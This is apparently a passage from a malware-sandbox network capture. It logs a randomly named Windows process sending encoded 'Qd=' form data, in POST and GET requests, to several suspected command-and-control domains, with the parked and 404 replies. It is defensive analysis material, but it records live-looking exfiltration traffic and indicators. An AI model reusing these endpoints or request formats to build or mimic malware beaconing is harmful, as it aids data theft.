                        Sep 3, 2024 10:43:47.542860031 CEST | 559 | IN | Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                        Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiY2FkNjdkZWEtZmRlYi00ZDljLWI3YjUtZmFjOGRhYzlhNWY1IiwicGFnZV90aW1lIjoxNzI1MzUzMD


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        2 | 192.168.2.4 | 64976 | 199.59.243.226 | 80 | 4908 | C:\Program Files (x86)\kriceSuLBGYeQMtBcZYTxPMWHoYLFLSJwBQRiQERHPMTnZOuFKWwoqzcK\ftfqgrfncDSuar.exe
                        Timestamp | Bytes transferred | Direction | Data
                        Sep 3, 2024 10:43:49.426989079 CEST | 726 | OUT | POST /12ts/ HTTP/1.1
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                        Accept-Encoding: gzip, deflate, br
                        Accept-Language: en-us
                        Connection: close
                        Content-Type: application/x-www-form-urlencoded
                        Cache-Control: max-age=0
                        Content-Length: 219
                        Host: www.myim.cloud
                        Origin: http://www.myim.cloud
                        Referer: http://www.myim.cloud/12ts/
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
                        Data Raw: 51 64 3d 53 49 63 7a 6f 69 6f 46 65 45 79 56 4a 41 4e 67 58 43 4f 45 55 44 2f 45 43 58 31 73 56 48 64 38 69 4d 49 48 7a 74 35 4e 52 74 59 6a 45 57 6f 46 41 36 63 55 55 32 38 52 37 34 30 44 32 30 68 7a 36 30 48 66 73 30 35 38 68 2b 63 6f 7a 48 6f 65 69 6e 4f 6a 42 4a 5a 6b 70 4b 6f 4b 4a 4b 65 69 77 77 6e 31 6f 44 68 32 35 51 78 70 49 35 34 42 4e 73 42 31 63 78 51 69 30 44 56 6f 77 56 6b 52 42 68 76 49 71 51 4a 77 67 50 62 6b 66 37 39 58 4f 4f 6c 53 79 69 6b 6f 52 75 56 67 55 64 6c 36 56 79 61 66 78 74 4f 6d 69 4a 72 64 7a 71 53 76 64 36 54 38 7a 61 53 77 30 6f 34 63 44 41 34 51 74 55 6c 66 66 34 58 77 59 6f 44 6c 37 32 70 54 62 31 6c 4d 54 45 59 3d
                        Data Ascii: Qd=SIczoioFeEyVJANgXCOEUD/ECX1sVHd8iMIHzt5NRtYjEWoFA6cUU28R740D20hz60Hfs058h+cozHoeinOjBJZkpKoKJKeiwwn1oDh25QxpI54BNsB1cxQi0DVowVkRBhvIqQJwgPbkf79XOOlSyikoRuVgUdl6VyafxtOmiJrdzqSvd6T8zaSw0o4cDA4QtUlff4XwYoDl72pTb1lMTEY=
                        Sep 3, 2024 10:43:49.860321045 CEST | 1236 | IN | HTTP/1.1 200 OK
                        date: Tue, 03 Sep 2024 08:43:49 GMT
                        content-type: text/html; charset=utf-8
                        content-length: 1106
                        x-request-id: 32545aa2-ff8b-4bfa-a24a-2a2421b880d4
                        cache-control: no-store, max-age=0
                        accept-ch: sec-ch-prefers-color-scheme
                        critical-ch: sec-ch-prefers-color-scheme
                        vary: sec-ch-prefers-color-scheme
                        x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_itJ5wTtca940PEFbw6OEW6TK0gd5SSm1dnv3u9dGB8Z4aZofyzywiFF0XtFVO1XfTe9BDxnofVlSGU4eCMcEkA==
                        set-cookie: parking_session=32545aa2-ff8b-4bfa-a24a-2a2421b880d4; expires=Tue, 03 Sep 2024 08:58:49 GMT; path=/
                        connection: close
                        Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 69 74 4a 35 77 54 74 63 61 39 34 30 50 45 46 62 77 36 4f 45 57 36 54 4b 30 67 64 35 53 53 6d 31 64 6e 76 33 75 39 64 47 42 38 5a 34 61 5a 6f 66 79 7a 79 77 69 46 46 30 58 74 46 56 4f 31 58 66 54 65 39 42 44 78 6e 6f 66 56 6c 53 47 55 34 65 43 4d 63 45 6b 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                        Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_itJ5wTtca940PEFbw6OEW6TK0gd5SSm1dnv3u9dGB8Z4aZofyzywiFF0XtFVO1XfTe9BDxnofVlSGU4eCMcEkA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                        Sep 3, 2024 10:43:49.860337019 CEST | 559 | IN | Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                        Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMzI1NDVhYTItZmY4Yi00YmZhLWEyNGEtMmEyNDIxYjg4MGQ0IiwicGFnZV90aW1lIjoxNzI1MzUzMD


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        3 | 192.168.2.4 | 64977 | 199.59.243.226 | 80 | 4908 | C:\Program Files (x86)\kriceSuLBGYeQMtBcZYTxPMWHoYLFLSJwBQRiQERHPMTnZOuFKWwoqzcK\ftfqgrfncDSuar.exe
                        Timestamp | Bytes transferred | Direction | Data
                        Sep 3, 2024 10:43:52.104077101 CEST | 10808 | OUT | POST /12ts/ HTTP/1.1
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                        Accept-Encoding: gzip, deflate, br
                        Accept-Language: en-us
                        Connection: close
                        Content-Type: application/x-www-form-urlencoded
                        Cache-Control: max-age=0
                        Content-Length: 10299
                        Host: www.myim.cloud
                        Origin: http://www.myim.cloud
                        Referer: http://www.myim.cloud/12ts/
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
                        Sep 3, 2024 10:43:52.570928097 CEST | 1236 | IN | HTTP/1.1 200 OK
                        date: Tue, 03 Sep 2024 08:43:51 GMT
                        content-type: text/html; charset=utf-8
                        content-length: 1106
                        x-request-id: 4520012f-a568-4c5c-81c8-e61b7933324f
                        cache-control: no-store, max-age=0
                        accept-ch: sec-ch-prefers-color-scheme
                        critical-ch: sec-ch-prefers-color-scheme
                        vary: sec-ch-prefers-color-scheme
                        x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_itJ5wTtca940PEFbw6OEW6TK0gd5SSm1dnv3u9dGB8Z4aZofyzywiFF0XtFVO1XfTe9BDxnofVlSGU4eCMcEkA==
                        set-cookie: parking_session=4520012f-a568-4c5c-81c8-e61b7933324f; expires=Tue, 03 Sep 2024 08:58:52 GMT; path=/
                        connection: close
                        Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_itJ5wTtca940PEFbw6OEW6TK0gd5SSm1dnv3u9dGB8Z4aZofyzywiFF0XtFVO1XfTe9BDxnofVlSGU4eCMcEkA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                        Sep 3, 2024 10:43:52.570943117 CEST | 559 | IN | Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNDUyMDAxMmYtYTU2OC00YzVjLTgxYzgtZTYxYjc5MzMzMjRmIiwicGFnZV90aW1lIjoxNzI1MzUzMD


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        4 | 192.168.2.4 | 64978 | 199.59.243.226 | 80 | 4908 | C:\Program Files (x86)\kriceSuLBGYeQMtBcZYTxPMWHoYLFLSJwBQRiQERHPMTnZOuFKWwoqzcK\ftfqgrfncDSuar.exe
                        Timestamp | Bytes transferred | Direction | Data
                        Sep 3, 2024 10:43:54.635910988 CEST | 440 | OUT | GET /12ts/?Qd=fK0TrVkIcECrXBtwchSXMVbqSAdnX01vsNkWvaJ0XbQUSkAwNJoncWp26b1Q7HgZ6hy5g1l23+w5zEE84XOKM4tZmbpnG+2S3WPWizQLwh5BCvs1Gs1UezE=&0z=mDcdcR8 HTTP/1.1
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                        Accept-Language: en-us
                        Connection: close
                        Host: www.myim.cloud
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
                        Sep 3, 2024 10:43:55.070641994 CEST | 1236 | IN | HTTP/1.1 200 OK
                        date: Tue, 03 Sep 2024 08:43:54 GMT
                        content-type: text/html; charset=utf-8
                        content-length: 1426
                        x-request-id: 5b586ea2-733a-403d-846d-8a8d6f84d65b
                        cache-control: no-store, max-age=0
                        accept-ch: sec-ch-prefers-color-scheme
                        critical-ch: sec-ch-prefers-color-scheme
                        vary: sec-ch-prefers-color-scheme
                        x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_tCi0V3syJ0av2aKsVxgp6Rd95rnnljzs5SbMQnv3wEApcl7xO2CQUcolgankZSmYTnH6IS0gfpez6vy40k/IxQ==
                        set-cookie: parking_session=5b586ea2-733a-403d-846d-8a8d6f84d65b; expires=Tue, 03 Sep 2024 08:58:55 GMT; path=/
                        connection: close
                        Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_tCi0V3syJ0av2aKsVxgp6Rd95rnnljzs5SbMQnv3wEApcl7xO2CQUcolgankZSmYTnH6IS0gfpez6vy40k/IxQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                        Sep 3, 2024 10:43:55.070658922 CEST | 879 | IN | Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNWI1ODZlYTItNzMzYS00MDNkLTg0NmQtOGE4ZDZmODRkNjViIiwicGFnZV90aW1lIjoxNzI1MzUzMD


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        5 | 192.168.2.4 | 64979 | 154.23.184.240 | 80 | 4908 | C:\Program Files (x86)\kriceSuLBGYeQMtBcZYTxPMWHoYLFLSJwBQRiQERHPMTnZOuFKWwoqzcK\ftfqgrfncDSuar.exe
                        Timestamp | Bytes transferred | Direction | Data
                        Sep 3, 2024 10:44:00.860408068 CEST | 703 | OUT | POST /ftud/ HTTP/1.1
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                        Accept-Encoding: gzip, deflate, br
                        Accept-Language: en-us
                        Connection: close
                        Content-Type: application/x-www-form-urlencoded
                        Cache-Control: max-age=0
                        Content-Length: 199
                        Host: www.d55dg.top
                        Origin: http://www.d55dg.top
                        Referer: http://www.d55dg.top/ftud/
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
                        Data Ascii: Qd=PSOowArgf8yorRktZ0U0lqvib5FjrtDc9JEM8vTcgb94zvRZqnBJ7v8wgx/BlKc2TpvqV6R14G5UOqDy3prSYjTfTO3mZNQk8wcEXquK7s4RZR0DzAEURuAvERYfDZ0f0b44JoXrK0ms1mFui8jH1FWKHZEkTokrYdfbCgPa/nVlgVDuS+Wz2ijxqp+O1D3Leg==
                        Sep 3, 2024 10:44:01.742069006 CEST | 302 | IN | HTTP/1.1 404 Not Found
                        Server: nginx
                        Date: Tue, 03 Sep 2024 08:44:01 GMT
                        Content-Type: text/html
                        Content-Length: 138
                        Connection: close
                        ETag: "668fe68e-8a"
                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        6 | 192.168.2.4 | 64980 | 154.23.184.240 | 80 | 4908 | C:\Program Files (x86)\kriceSuLBGYeQMtBcZYTxPMWHoYLFLSJwBQRiQERHPMTnZOuFKWwoqzcK\ftfqgrfncDSuar.exe
                        Timestamp | Bytes transferred | Direction | Data
                        Sep 3, 2024 10:44:03.404881954 CEST | 723 | OUT | POST /ftud/ HTTP/1.1
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                        Accept-Encoding: gzip, deflate, br
                        Accept-Language: en-us
                        Connection: close
                        Content-Type: application/x-www-form-urlencoded
                        Cache-Control: max-age=0
                        Content-Length: 219
                        Host: www.d55dg.top
                        Origin: http://www.d55dg.top
                        Referer: http://www.d55dg.top/ftud/
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
                        Data Ascii: Qd=PSOowArgf8yopx4tUzo0gKvtUZFjxdDY9OMM8t+Rgut4yOhZrjtJ4v8wvR/EhKcpTpziV/p14CpUOrzyiOHVejTBK+3ka9Qk8wcEXu+g7sgRZBEDxkYXcOAuDRYfVp0b0b4KJpKOK2us1jhuzI3G/FWIJ5F7f4RAYsiFIAe84XZ/lTS0DP3kkiHC3u364AKCFsKAnIil6gcS2QtZsIf+oCg=
                        Sep 3, 2024 10:44:04.255404949 CEST | 302 | IN | HTTP/1.1 404 Not Found
                        Server: nginx
                        Date: Tue, 03 Sep 2024 08:44:04 GMT
                        Content-Type: text/html
                        Content-Length: 138
                        Connection: close
                        ETag: "668fe68e-8a"
                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        7 | 192.168.2.4 | 64981 | 154.23.184.240 | 80 | 4908 | C:\Program Files (x86)\kriceSuLBGYeQMtBcZYTxPMWHoYLFLSJwBQRiQERHPMTnZOuFKWwoqzcK\ftfqgrfncDSuar.exe
                        Timestamp | Bytes transferred | Direction | Data
                        Sep 3, 2024 10:44:05.977171898 CEST | 10805 | OUT | POST /ftud/ HTTP/1.1
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                        Accept-Encoding: gzip, deflate, br
                        Accept-Language: en-us
                        Connection: close
                        Content-Type: application/x-www-form-urlencoded
                        Cache-Control: max-age=0
                        Content-Length: 10299
                        Host: www.d55dg.top
                        Origin: http://www.d55dg.top
                        Referer: http://www.d55dg.top/ftud/
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
                        Sep 3, 2024 10:44:07.048290968 CEST | 302 | IN | HTTP/1.1 404 Not Found
                        Server: nginx
                        Date: Tue, 03 Sep 2024 08:44:06 GMT
                        Content-Type: text/html
                        Content-Length: 138
                        Connection: close
                        ETag: "668fe68e-8a"
                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        8 | 192.168.2.4 | 64982 | 154.23.184.240 | 80 | 4908 | C:\Program Files (x86)\kriceSuLBGYeQMtBcZYTxPMWHoYLFLSJwBQRiQERHPMTnZOuFKWwoqzcK\ftfqgrfncDSuar.exe
                        Timestamp | Bytes transferred | Direction | Data
                        Sep 3, 2024 10:44:08.511388063 CEST | 439 | OUT | GET /ftud/?0z=mDcdcR8&Qd=CQmIz2bNYdnQtzE2RxYa2qz/fuFRk+DUuZcFlqzFgfI5jfpPm1EP0eBYxBqCjdR2XMjWQLlFnnRrMqX4rM3bCnr6auDpWI0NkhYnTr7G4MgOIGUz90I9VfU= HTTP/1.1
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                        Accept-Language: en-us
                        Connection: close
                        Host: www.d55dg.top
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
                        Sep 3, 2024 10:44:09.372620106 CEST | 302 | IN | HTTP/1.1 404 Not Found
                        Server: nginx
                        Date: Tue, 03 Sep 2024 08:44:09 GMT
                        Content-Type: text/html
                        Content-Length: 138
                        Connection: close
                        ETag: "668fe68e-8a"
                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        9 | 192.168.2.4 | 64987 | 162.0.239.141 | 80 | 4908 | C:\Program Files (x86)\kriceSuLBGYeQMtBcZYTxPMWHoYLFLSJwBQRiQERHPMTnZOuFKWwoqzcK\ftfqgrfncDSuar.exe
                        Timestamp | Bytes transferred | Direction | Data
                        Sep 3, 2024 10:44:27.963745117 CEST | 712 | OUT | POST /mkan/ HTTP/1.1
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                        Accept-Encoding: gzip, deflate, br
                        Accept-Language: en-us
                        Connection: close
                        Content-Type: application/x-www-form-urlencoded
                        Cache-Control: max-age=0
                        Content-Length: 199
                        Host: www.fineg.online
                        Origin: http://www.fineg.online
                        Referer: http://www.fineg.online/mkan/
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
                        Data Ascii: Qd=z8pzi1wICkJUqy8OkBR5wj14OTOWWKM4PvBDs7ghcomwhECoJ9D90HCWfPAIr+dAEjkNd5ddeaKD5pC2/QB+gwBxqasi9kMdYq5UG5D2kqnavD4jW3vog23rYozP54ePekX5MochjLC/SBMIWJQxA5l2xTGOfYJ6AKqD8I3aRtSEu3MCHlXzaXixcpE8i5+EFQ==
                        Sep 3, 2024 10:44:28.528044939 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                        Date: Tue, 03 Sep 2024 08:44:28 GMT
                        Server: Apache
                        Content-Length: 18121
                        Connection: close
                        Content-Type: text/html
                        Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="/404style.css"></head><body>... partial:index.partial.html --><div class="main"> <div> <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 1000 355"> <g id="ocean"> <path id="sky" class="st0" d="M0 0h1000v203.1H0z"/> <linearGradient id="water_1_" gradientUnits="userSpaceOnUse" x1="500" y1="354" x2="500" y2="200.667"> <stop offset="0" stop-color="#fff"/> <stop offset="1" stop-color="#b3dcdf"/> </linearGradient> <path id="water" fill="url(#water_1_)" d="M0 200.7h1000V354H0z"/> <path id="land" class="st0" d="M0 273.4h1000V354H0z"/> <g id="bumps"> <path class="st0" d="M0 275.2s83.8-28 180-28 197 28 197 28H0z"/> <path class="st0" d="M377 275.2s54.7-28 117.5-28 128.6 28 128.6 28H377z"/> <path class="st0" d="M623.2 275.2s83.7-28 179.9-28 196.9 28 196.9 28H623.2z"/> <path class="st0" d="M-998 275.2s83.8-28 180 [TRUNCATED]


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        10 | 192.168.2.4 | 64988 | 162.0.239.141 | 80 | 4908 | C:\Program Files (x86)\kriceSuLBGYeQMtBcZYTxPMWHoYLFLSJwBQRiQERHPMTnZOuFKWwoqzcK\ftfqgrfncDSuar.exe
                        Timestamp | Bytes transferred | Direction | Data
                        Sep 3, 2024 10:44:30.505765915 CEST | 732 | OUT | POST /mkan/ HTTP/1.1
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                        Accept-Encoding: gzip, deflate, br
                        Accept-Language: en-us
                        Connection: close
                        Content-Type: application/x-www-form-urlencoded
                        Cache-Control: max-age=0
                        Content-Length: 219
                        Host: www.fineg.online
                        Origin: http://www.fineg.online
                        Referer: http://www.fineg.online/mkan/
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
                        Data Ascii: Qd=z8pzi1wICkJUoW4OmiJ52D17AzOWdqMkPvdDs4sxdaSwvGaoI/r9zHCWLfAJ2udxEjoFd4hdeaeD5tK2/hB5igBzh6skg0MdYq5UG6+tkpXavTojECTr8m3qfozPyYeLekWeMpBpjJq/SB8IXd9nVplw1THpcI4FJ5Xq5ZH/PdC5vxdYWU2kIXGCBuNIv6DNeRHwc5O+4WipfI7A+v7tBpI=
                        Sep 3, 2024 10:44:31.069830894 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                        Date: Tue, 03 Sep 2024 08:44:30 GMT
                        Server: Apache
                        Content-Length: 18121
                        Connection: close
                        Content-Type: text/html
                        Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="/404style.css"></head><body>... partial:index.partial.html --><div class="main"> <div> <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 1000 355"> <g id="ocean"> <path id="sky" class="st0" d="M0 0h1000v203.1H0z"/> <linearGradient id="water_1_" gradientUnits="userSpaceOnUse" x1="500" y1="354" x2="500" y2="200.667"> <stop offset="0" stop-color="#fff"/> <stop offset="1" stop-color="#b3dcdf"/> </linearGradient> <path id="water" fill="url(#water_1_)" d="M0 200.7h1000V354H0z"/> <path id="land" class="st0" d="M0 273.4h1000V354H0z"/> <g id="bumps"> <path class="st0" d="M0 275.2s83.8-28 180-28 197 28 197 28H0z"/> <path class="st0" d="M377 275.2s54.7-28 117.5-28 128.6 28 128.6 28H377z"/> <path class="st0" d="M623.2 275.2s83.7-28 179.9-28 196.9 28 196.9 28H623.2z"/> <path class="st0" d="M-998 275.2s83.8-28 180 [TRUNCATED]
                        Sep 3, 2024 10:44:31.069844007 CEST | 1236 | IN | Data Raw: 35 2d 32 38 20 31 32 38 2e 36 20 32 38 20 31 32 38 2e 36 20 32 38 48 2d 36 32 31 7a 22 2f 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 30 22 20 64 3d 22 4d 2d 33 37 34 2e 38 20 32 37 35 2e 32 73 38 33 2e 37 2d 32 38 20 31
                        Data Ascii: 5-28 128.6 28 128.6 28H-621z"/> <path class="st0" d="M-374.8 275.2s83.7-28 179.9-28S2 275.2 2 275.2h-376.8z"/> </g> </g> <g id="tracks"> <path class="st2" d="M9.8 282.4h-3L0 307.6h3z"/> <path class="st2" d="M19.8 282.4h-3
                        Sep 3, 2024 10:44:31.069849968 CEST | 1236 | IN | Data Raw: 22 4d 31 39 39 2e 38 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 32 30 39 2e 38 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e
                        Data Ascii: "M199.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M209.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M219.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M229.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M239.8 282.4h-
                        Sep 3, 2024 10:44:31.069889069 CEST | 672 | IN | Data Raw: 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 34 31 39 2e 38 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 34 32 39 2e 38
                        Data Ascii: ath class="st2" d="M419.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M429.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M439.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M449.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2"
                        Sep 3, 2024 10:44:31.069899082 CEST | 1236 | IN | Data Raw: 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 39 37 30 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d
                        Data Ascii: <path class="st2" d="M970 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M960 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M950 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M940 282.4h-3l-6.8 25.2h3z"/> <path class="st2"
                        Sep 3, 2024 10:44:31.069910049 CEST | 1236 | IN | Data Raw: 4d 37 35 30 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 37 34 30 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22
                        Data Ascii: M750 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M740 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M730 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M720 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M710 282.4h-3l-6.8 25.2
